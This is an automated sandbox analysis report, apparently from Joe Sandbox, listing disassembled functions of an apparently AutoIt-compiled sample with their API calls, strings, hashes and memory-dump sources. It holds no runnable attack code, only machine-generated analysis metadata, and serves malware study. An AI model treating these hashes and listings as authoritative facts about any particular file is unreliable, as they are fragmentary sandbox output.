                • Opcode Fuzzy Hash: 1125af3ba84fcb57f6eb32a4000786138d207814948eaada18722300cb055f0c
                • Instruction Fuzzy Hash: 3D518F31A001169BCF14DFACC9609BEB7E5BF66724B614229E826E72C4EB35DD40C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32 ref: 00193774
                • CoUninitialize.OLE32 ref: 0019377F
                • CoCreateInstance.OLE32(?,00000000,00000017,001AFB78,?), ref: 001937D9
                • IIDFromString.OLE32(?,?), ref: 0019384C
                • VariantInit.OLEAUT32(?), ref: 001938E4
                • VariantClear.OLEAUT32(?), ref: 00193936
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                • API String ID: 636576611-1287834457
                • Opcode ID: 59756aa284fec563001c68581f17a30a824606660e2e835cdd1f43e8ca5c2c7b
                • Instruction ID: 3c7c5cbc8d88d3fc7ec82f5ff2230a11542add84899f70119a0847e5402bb82e
                • Opcode Fuzzy Hash: 59756aa284fec563001c68581f17a30a824606660e2e835cdd1f43e8ca5c2c7b
                • Instruction Fuzzy Hash: 2E61C070608311AFD715DF54C888F6ABBE8EF49714F00091DF9A59B291D770EE89CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00183388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001833CF
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001833F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LoadString$_wcslen
                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                • API String ID: 4099089115-3080491070
                • Opcode ID: 53b82d3796c8956e4556425d1818dc1d282ffbb3297f8f1de58a36a716f31f13
                • Instruction ID: ef22506665831ac35ec8ea795cea7d58a3ced3d3a258314a14eca6fcb3727460
                • Opcode Fuzzy Hash: 53b82d3796c8956e4556425d1818dc1d282ffbb3297f8f1de58a36a716f31f13
                • Instruction Fuzzy Hash: 27518D71900209BADF19EBE0DD42EEEB778AF24740F144066F51572192EB312F98DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: APPEND$EXISTS$KEYS$REMOVE
                • API String ID: 1256254125-769500911
                • Opcode ID: 3a6aa0312fced72721cadb8fce5c8bfc37f023551661b8a3795a8d1bb48cce96
                • Instruction ID: 3d30b254e5f38f8bfc7a1165333824589b8fa7d931f9360ea207dc37bd0be096
                • Opcode Fuzzy Hash: 3a6aa0312fced72721cadb8fce5c8bfc37f023551661b8a3795a8d1bb48cce96
                • Instruction Fuzzy Hash: B6412932A080269BCB106F7DC8D06BE77B1AF64764B248129F629DB284E735CD81C390
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00185393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 001853A0
                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00185416
                • GetLastError.KERNEL32 ref: 00185420
                • SetErrorMode.KERNEL32(00000000,READY), ref: 001854A7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Error$Mode$DiskFreeLastSpace
                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                • API String ID: 4194297153-14809454
                • Opcode ID: 9f7a0eb2a904b1140f4b1f41c9f6d257b438a6bf03d5794c4cb801bb3085ee64
                • Instruction ID: 569dbdea0695c4d49e5060becbf136e7f11c6a6fe14d9bf50b0dfa42ca687463
                • Opcode Fuzzy Hash: 9f7a0eb2a904b1140f4b1f41c9f6d257b438a6bf03d5794c4cb801bb3085ee64
                • Instruction Fuzzy Hash: B7318F35A00604DFD714EF68C584AAA7BB6EF55305F148066E405DB392EB71EE86CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                Download Yara Rule
                APIs
                • CreateMenu.USER32 ref: 001A3C79
                • SetMenu.USER32(?,00000000), ref: 001A3C88
                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A3D10
                • IsMenu.USER32(?), ref: 001A3D24
                • CreatePopupMenu.USER32 ref: 001A3D2E
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A3D5B
                • DrawMenuBar.USER32 ref: 001A3D63
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                • String ID: 0$F
                • API String ID: 161812096-3044882817
                • Opcode ID: 9b38f66fc07ffbfd49141295c519971cb510d4688b2cb44ae7a0eae75481e3ee
                • Instruction ID: 7cbe77a66e88797e34e5fe49658de23b5f9813c78f6b01619d1f5a11875ccda4
                • Opcode Fuzzy Hash: 9b38f66fc07ffbfd49141295c519971cb510d4688b2cb44ae7a0eae75481e3ee
                • Instruction Fuzzy Hash: F2414779A01209EFDB14CFA4E884BEA7BB5FF4A354F140029F956A7360D770AA50CF94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00171F64
                • GetDlgCtrlID.USER32 ref: 00171F6F
                • GetParent.USER32 ref: 00171F8B
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00171F8E
                • GetDlgCtrlID.USER32(?), ref: 00171F97
                • GetParent.USER32(?), ref: 00171FAB
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00171FAE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 711023334-1403004172
                • Opcode ID: 6dbc848a4c5d0c0403bd1d04916ba6f4b52651dd50cb87a431fafc09b118a49f
                • Instruction ID: 8f099d3cceae73f6882f900c25497fc3c858a93180c0f3909a4d33a5a24f67f1
                • Opcode Fuzzy Hash: 6dbc848a4c5d0c0403bd1d04916ba6f4b52651dd50cb87a431fafc09b118a49f
                • Instruction Fuzzy Hash: E721CF70900218BBCF05EFA4DC95EEEBBB9EF16350B104116F969A72A1CB345948DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001A3A9D
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001A3AA0
                • GetWindowLongW.USER32(?,000000F0), ref: 001A3AC7
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001A3AEA
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001A3B62
                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001A3BAC
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001A3BC7
                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001A3BE2
                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001A3BF6
                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001A3C13
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: ae62d21020124b6a57641f7da715c96661deb1c6491cef733faab737793923b2
                • Instruction ID: dae47c8eeb0e75531b3ceec866bdee7a6b85855b0dfd9b8e826eedf35dc18a81
                • Opcode Fuzzy Hash: ae62d21020124b6a57641f7da715c96661deb1c6491cef733faab737793923b2
                • Instruction Fuzzy Hash: A5615C75900248AFDB10DFA4CC81FEE77B8EB0A714F10415AFA15AB291D770AA85DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00142C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00142C94
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 00142CA0
                • _free.LIBCMT ref: 00142CAB
                • _free.LIBCMT ref: 00142CB6
                • _free.LIBCMT ref: 00142CC1
                • _free.LIBCMT ref: 00142CCC
                • _free.LIBCMT ref: 00142CD7
                • _free.LIBCMT ref: 00142CE2
                • _free.LIBCMT ref: 00142CED
                • _free.LIBCMT ref: 00142CFB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 62e56f452a02354dbcd4c479f8fbcf1e1238eebcf55eb3b146a2458220018238
                • Instruction ID: d8f5c273083752f6c149300692f15e803c81f23a77523a9439cbfa0dbb3c5ce1
                • Opcode Fuzzy Hash: 62e56f452a02354dbcd4c479f8fbcf1e1238eebcf55eb3b146a2458220018238
                • Instruction Fuzzy Hash: CA119076100118AFDB02EF96D982CDD3BA9FF15354F9144A5FA489B232DB31EA909B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00111410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                Download Yara Rule
                APIs
                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00111459
                • OleUninitialize.OLE32(?,00000000), ref: 001114F8
                • UnregisterHotKey.USER32(?), ref: 001116DD
                • DestroyWindow.USER32(?), ref: 001524B9
                • FreeLibrary.KERNEL32(?), ref: 0015251E
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0015254B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                • String ID: close all
                • API String ID: 469580280-3243417748
                • Opcode ID: 7137fb1292318abe067a31910ba8d6c84924e62316752dc8b4699966d1a3b206
                • Instruction ID: a816e3341f212d8d2a63a39184ae451e99c8a32625fd48614b0a6863e9485c15
                • Opcode Fuzzy Hash: 7137fb1292318abe067a31910ba8d6c84924e62316752dc8b4699966d1a3b206
                • Instruction Fuzzy Hash: 5ED1BC32701222DFCB2DEF14C598BA9F7A0BF16700F1541ADE95A6B252DB30AC56CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00187DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                Download Yara Rule
                APIs
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00187FAD
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00187FC1
                • GetFileAttributesW.KERNEL32(?), ref: 00187FEB
                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00188005
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188017
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188060
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001880B0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentDirectory$AttributesFile
                • String ID: *.*
                • API String ID: 769691225-438819550
                • Opcode ID: b95a22c1402307989c62ec4326db2f0bafa95d84ad49468c638332c025d09a8e
                • Instruction ID: 1822f0eb25590ceb206329fbe6dfb2ccbbb4952a5795e96161c95ffb4bfd7994
                • Opcode Fuzzy Hash: b95a22c1402307989c62ec4326db2f0bafa95d84ad49468c638332c025d09a8e
                • Instruction Fuzzy Hash: B981A1725082059BCB24FF14C4849AAB7E9BF99310F644C6EF889D7290EB35DE45CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00115BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,000000EB), ref: 00115C7A
                  • Part of subcall function 00115D0A: GetClientRect.USER32(?,?), ref: 00115D30
                  • Part of subcall function 00115D0A: GetWindowRect.USER32(?,?), ref: 00115D71
                  • Part of subcall function 00115D0A: ScreenToClient.USER32(?,?), ref: 00115D99
                • GetDC.USER32 ref: 001546F5
                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00154708
                • SelectObject.GDI32(00000000,00000000), ref: 00154716
                • SelectObject.GDI32(00000000,00000000), ref: 0015472B
                • ReleaseDC.USER32(?,00000000), ref: 00154733
                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001547C4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                • String ID: U
                • API String ID: 4009187628-3372436214
                • Opcode ID: a276446ecd5819704405e571ebebd091dd7c01a0ec614ec4289e97a069ce10d5
                • Instruction ID: a66c7950578561d74e8e4fcc032e93e51fcdefd99a3a06035c33d63d01883b35
                • Opcode Fuzzy Hash: a276446ecd5819704405e571ebebd091dd7c01a0ec614ec4289e97a069ce10d5
                • Instruction Fuzzy Hash: D571FF34400205DFCF29CF64C984AEA3BB6FF8A36AF144229ED655E266C73088C5DF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001835E4
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • LoadStringW.USER32(001E2390,?,00000FFF,?), ref: 0018360A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LoadString$_wcslen
                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 4099089115-2391861430
                • Opcode ID: 089823311d9c64c6d7fa548fbcd7483c97ac12fce95e6ce729a63fa7fa703d9c
                • Instruction ID: 98680a9ddeabffc3554d4f3daba0df75faf6b515c1b626adeb8bf9ba08aa8fcf
                • Opcode Fuzzy Hash: 089823311d9c64c6d7fa548fbcd7483c97ac12fce95e6ce729a63fa7fa703d9c
                • Instruction Fuzzy Hash: 63516D71800209BADF19EBE0DC52EEEBB38AF24710F144125F525761A1EB316BD9DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                  • Part of subcall function 0012912D: GetCursorPos.USER32(?), ref: 00129141
                  • Part of subcall function 0012912D: ScreenToClient.USER32(00000000,?), ref: 0012915E
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000001), ref: 00129183
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000002), ref: 0012919D
                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 001A8B6B
                • ImageList_EndDrag.COMCTL32 ref: 001A8B71
                • ReleaseCapture.USER32 ref: 001A8B77
                • SetWindowTextW.USER32(?,00000000), ref: 001A8C12
                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001A8C25
                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 001A8CFF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                • API String ID: 1924731296-2107944366
                • Opcode ID: 17bdcdb3c02d713fffb0330491cc4a35be595aed42a2e31c535bc8e4fb8cf3d5
                • Instruction ID: 121f4881d590c8435c49c5d58225b1261f9a1c588006c51f6e116d75404167c4
                • Opcode Fuzzy Hash: 17bdcdb3c02d713fffb0330491cc4a35be595aed42a2e31c535bc8e4fb8cf3d5
                • Instruction Fuzzy Hash: A6519C74204204AFD704DF14DC95FAE77E4FB89714F00062DF996A72E2DB709994CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                Download Yara Rule
                APIs
                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0018C272
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018C29A
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0018C2CA
                • GetLastError.KERNEL32 ref: 0018C322
                • SetEvent.KERNEL32(?), ref: 0018C336
                • InternetCloseHandle.WININET(00000000), ref: 0018C341
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                • String ID:
                • API String ID: 3113390036-3916222277
                • Opcode ID: 8c1f7ebf03e790a7907574f018b78408e1280f7405d1fc464457c5e19d19272e
                • Instruction ID: eddcef508d0e229c694caeb85185fcc27ea7b29a747216c39e91d6dc05cbbec4
                • Opcode Fuzzy Hash: 8c1f7ebf03e790a7907574f018b78408e1280f7405d1fc464457c5e19d19272e
                • Instruction Fuzzy Hash: 1B316DB1500604AFD721AFA49888AAB7BFCFB5A744F10851EF84692640DB34DE459FB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00153AAF,?,?,Bad directive syntax error,001ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001798BC
                • LoadStringW.USER32(00000000,?,00153AAF,?), ref: 001798C3
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00179987
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
